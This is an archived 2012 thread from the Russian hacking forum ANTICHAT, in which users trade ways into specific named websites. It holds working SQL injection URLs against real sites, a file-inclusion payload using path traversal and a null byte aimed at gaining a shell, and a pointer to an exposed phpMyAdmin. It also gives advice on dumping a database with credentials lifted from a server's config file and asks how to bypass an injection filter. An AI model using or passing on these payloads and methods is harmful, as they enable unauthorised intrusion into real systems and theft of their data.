ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
17.01.2012, 01:07
|
|
Guest
Сообщений: n/a
Провел на форуме:
23576
Репутация:
-1
|
|
http://www.toytricksy.com/?a=index
проконсультируйте это пхп инъекцыя иль нет??
|
|
|
|
17.01.2012, 01:17
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401
Репутация:
0
|
|
Сообщение от pirat0
pirat0 said:
http://www.toytricksy.com/?a=index
проконсультируйте это пхп инъекцыя иль нет??
нет. это ошибка подключения другого файла, который не передаётся в параметре.
|
|
|
17.01.2012, 01:41
|
|
Участник форума
Регистрация: 08.12.2008
Сообщений: 164
Провел на форуме:
862722
Репутация:
54
|
|
Сообщение от None
http://ckk.sakh.com/interface.php?file=
Инклуд с фильтром:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]import_request_variables[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'GPC'[/COLOR][COLOR="#007700"]);
if ([/COLOR][COLOR="#0000BB"]strstr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'..'[/COLOR][COLOR="#007700"]) ||[/COLOR][COLOR="#0000BB"]strstr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'//'[/COLOR][COLOR="#007700"]) ||[/COLOR][COLOR="#0000BB"]strstr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'http'[/COLOR][COLOR="#007700"])
||[/COLOR][COLOR="#0000BB"]strstr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'interface'[/COLOR][COLOR="#007700"]) ) exit;
[/COLOR][/COLOR]
Есть ли там где-то еще читалка, с помощью которой этот код можно получить? (код получен не мною)
|
|
|
|
17.01.2012, 02:46
|
|
Guest
Сообщений: n/a
Провел на форуме:
179355
Репутация:
53
|
|
http://www.sitc.ru/index.php?id=90000512
тиц 350
blind sql.
реально такое раскрутить? без information_schema то
|
|
|
|
17.01.2012, 06:22
|
|
Guest
Сообщений: n/a
Провел на форуме:
29020
Репутация:
55
|
|
Реально, также брутишь таблицы, колонки и через блайнд забираешь инфу. И еще, там не слепая инъекция:
Код:
Code:
http://www.sitc.ru/index.php?id=90000512%27+and+5=4+union+select+1,2,3,4,5,version%28%29,7,8,9,10,11,12,13--+
-----------------------
AnGeI, думаю стоит копать в сторону соседних сайтов. Вот сайн на том же сервере
http://cdut.sakh.com/phpmyadmin/ - открытый phpmyadmin (setup.php нету)
есть инъекция, только толку от нее нет особого
Код:
Code:
http://cdut.sakh.com/?view=forum&fid=-2161%27+union+select+1,2,3,4,5,6--+
есть рабочий инклуд
Код:
Code:
http://cdut.sakh.com/?nauka=index&project=../../avatars/0.gif%00
залить аватару свою не удалось, там вылетает ошибка с open_basedir. Так что если найдешь что инклудить считай шел есть
Ну и доступ в админку, авторизация на самом сайте
...
Дальше копать лень, ибо все равно там ничего интересного нет, удачи |
|
|
|
18.01.2012, 00:48
|
|
Guest
Сообщений: n/a
Провел на форуме:
23576
Репутация:
-1
|
|
http://rzva.ru/js/menu.php?language=russian' подскажите что можно сделать, а то чет не реагирует на запросы((
|
|
|
|
18.01.2012, 02:16
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708
Репутация:
208
|
|
Ребята, какая то мне не понятная ситуация ))
в одном сервере мне надо "выгрузить" (дампить) SQL базу и чтоб нормально читался
через бразуер когда открываю на сервере - получаю что то в роде шифрованного текста, пытался кодировку менять, но бестолку..
но там также есть конфиграционный файл, с логином и паролем типа такого:
Код:
Code:
mysql username = "logn"
mysql password = "password"
###
'1 list' table name = "rep1"
'reports' table name prefix = "rep2"
'2' table name = "h"
mysql db name = "NAME"
mysql host = "127.0.0.1"
mysql port = "3306"
mysql unix socket = "/var/run/mysqld/mysqld.sock"
### config end
помогите снять информацию !
Не пинать сильно, можно сказать не соображаю в этом деле )) особо в кодинге php/sql, по этому лучше посоветуйте как можно "автоматический" метод. |
|
|
|
18.01.2012, 02:34
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401
Репутация:
0
|
|
Сообщение от None
через бразуер когда открываю на сервере - получаю что то в роде шифрованного текста, пытался кодировку менять, но бестолку..
ты уже сделал дамп? что ты в браузере открываешь?
если сделал, то скачай его на винт и открывай не в браузере.
если нет, то найди пма, залогинись с данными из файла и сделай экспорт базы. возможные папки:
phpmyadmin
pma
myadmin, etc... гугли
если есть доступ к файлам, то поставь дампер какой-нить, например:
http://sypex.net/ru/products/dumper/downloads/
если есть доступ к консоли, то через mysqldump сделай:
http://dev.mysql.com/doc/refman/5.1/en/mysqldump.html
|
|
|
|
18.01.2012, 06:50
|
|
Guest
Сообщений: n/a
Провел на форуме:
40748
Репутация:
78
|
|
Сообщение от pirat0
pirat0 said:
http://rzva.ru/js/menu.php?language=russian' подскажите что можно сделать, а то чет не реагирует на запросы((
Там что-то типа
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];
if([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'language'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]'russian'[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT .. WHERE lang=[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]AND ...."[/COLOR][COLOR="#007700"]);
[/COLOR][/COLOR]
Думаю что как-то так и выглядит код.
Инъекции нет.
Сообщение от AnGeI
AnGeI said:
Инклуд с фильтром:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]import_request_variables[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'GPC'[/COLOR][COLOR="#007700"]);
if ([/COLOR][COLOR="#0000BB"]strstr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'..'[/COLOR][COLOR="#007700"]) ||[/COLOR][COLOR="#0000BB"]strstr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'//'[/COLOR][COLOR="#007700"]) ||[/COLOR][COLOR="#0000BB"]strstr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'http'[/COLOR][COLOR="#007700"])
||[/COLOR][COLOR="#0000BB"]strstr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'interface'[/COLOR][COLOR="#007700"]) ) exit;
[/COLOR][/COLOR]
Есть ли там где-то еще читалка, с помощью которой этот код можно получить? (код получен не мною) Этот код просто написан по реакции скрипта на параметры, не более.
Сообщение от justonline
justonline said:
http://www.sitc.ru/index.php?id=90000512
тиц 350
blind sql.
реально такое раскрутить? без information_schema то
Где ты там Blind нашел?
http://www.sitc.ru/index.php?id=90000512%27%20and%201=3%20union%20sel ect%201,2,3,4,version%28%29,6,7,8,9,10,11,12,13%20--%201
Да, версия 4, обычный брут таблиц/колонок катит.
|
|
|
|
19.01.2012, 11:18
|
|
Guest
Сообщений: n/a
Провел на форуме:
2851
Репутация:
0
|
|
Эээ..идиотский фильтр
Дело в том, что фильтруется точка information_shema. так что information_shema никак ненапишешь...как обойти такой фильтр?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
